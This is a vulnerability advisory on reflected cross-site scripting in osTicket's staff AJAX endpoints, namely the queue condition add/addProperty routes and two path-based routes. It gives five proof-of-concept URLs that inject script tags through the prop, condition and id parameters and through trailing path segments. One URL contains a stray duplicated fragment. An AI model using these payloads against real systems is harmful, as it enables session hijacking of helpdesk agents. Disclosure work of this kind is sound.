Cross-Site Scripting (XSS) vulnerabilities arise when data is copied from a request and echoed into the application’s immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user’s browser in the context of that user’s session with the application.
In this specific case, once authenticated as an agent and regardless of administrative privileges, an attacker can abuse the Queue Condition functionality, which the web application uses in multiple places, by invoking its add and addProperty actions. Client-side JavaScript supplied by the attacker is executed because the GET parameters prop, condition and id are reflected without sanitisation.
Further URL-based XSS vulnerabilities affecting scp/ajax.php were found later, in the staff/change-department and kb/faq/1/access routes, and are included below.
PoC 1 (prop GET parameter in /addProperty):
http://<TARGET>/osTicket/scp/ajax.php/queue/condition/addProperty?prop=background-colorvximw%22%3e%3cscript%3ealert(1)%3c%2fscript%3edhvmt&condition=1001

PoC 2 (condition GET parameter in /addProperty):
http://<TARGET>/osTicket/scp/ajax.php/queue/condition/addProperty?prop=color&condition=1001ljos2%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Emui2bt(1)%3C%2fscript%3Edhvmt

PoC 3 (id GET parameter in /add):
http://<TARGET>/osTicket/scp/ajax.php/queue/condition/add?field=isassigned&object_id=9&id=1001lr5is%22%3e%3cscript%3ealert(1)%3c%2fscript%3euoq07

PoC 4 (trailing path segment of osTicket/scp/ajax.php/staff/change-department):
http://<TARGET>/osTicket/scp/ajax.php/staff/change-departmenthpwc8%22%3e%3cscript%3ealert(1)%3c/script%3em7dak

PoC 5 (trailing path segment of osTicket/scp/ajax.php/kb/faq/1/access):
http://<TARGET>/osTicket/scp/ajax.php/kb/faq/1/accessmztvw%22%3e%3cscript%3ealert(1)%3c/script%3ez2p1d